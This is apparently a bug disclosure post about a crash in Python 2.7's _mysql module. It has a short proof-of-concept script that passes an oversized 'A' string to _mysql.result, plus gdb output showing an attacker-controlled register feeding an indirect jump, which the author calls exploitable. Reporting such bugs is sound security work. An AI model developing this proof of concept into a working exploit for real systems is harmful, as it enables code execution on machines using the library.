Hello.
I found a vulnerability in the _mysql module.
PoC below:
```python
#!/usr/bin/python2.7
import _mysql
RDX=0x66666666
payload="A"*2048
_mysql.result(payload,RDX)
```
It's an exploitable bug; I'm working on an exploit.
```
(gdb) run mysql.py
Starting program: /usr/bin/python2.7 mysql.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff38e7f3c in mysql_use_result () from /usr/lib/libmysqlclient.so.18
(gdb) info reg
rax 0x4141414141414141 4702111234474983745
rbx 0x7ffff7e91b90 140737352637328
rcx 0x0 0
rdx 0x66666666 1717986918
rsi 0x7ffff7eb1ec0 140737352769216
rdi 0x5555557f9890 93824995006608
rbp 0x7fffffffe120 0x7fffffffe120
rsp 0x7fffffffe0a8 0x7fffffffe0a8
r8 0x7fffffffdd00 140737488346368
r9 0x7fffffffdd80 140737488346496
r10 0x5555557824f0 93824994518256
r11 0x2 2
r12 0x5555557560a0 93824994336928
r13 0x0 0
r14 0x7ffff7e939c7 140737352645063
r15 0x7ffff7e91b90 140737352637328
rip 0x7ffff38e7f3c 0x7ffff38e7f3c <mysql_use_result+12>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) disas $rip
Dump of assembler code for function mysql_use_result:
0x00007ffff38e7f30 <+0>: push %rbp
0x00007ffff38e7f31 <+1>: mov 0x4d0(%rdi),%rax
0x00007ffff38e7f38 <+8>: mov %rsp,%rbp
0x00007ffff38e7f3b <+11>: pop %rbp
=> 0x00007ffff38e7f3c <+12>: mov 0x18(%rax),%rax
0x00007ffff38e7f40 <+16>: jmpq *%rax
End of assembler dump.
(gdb)
```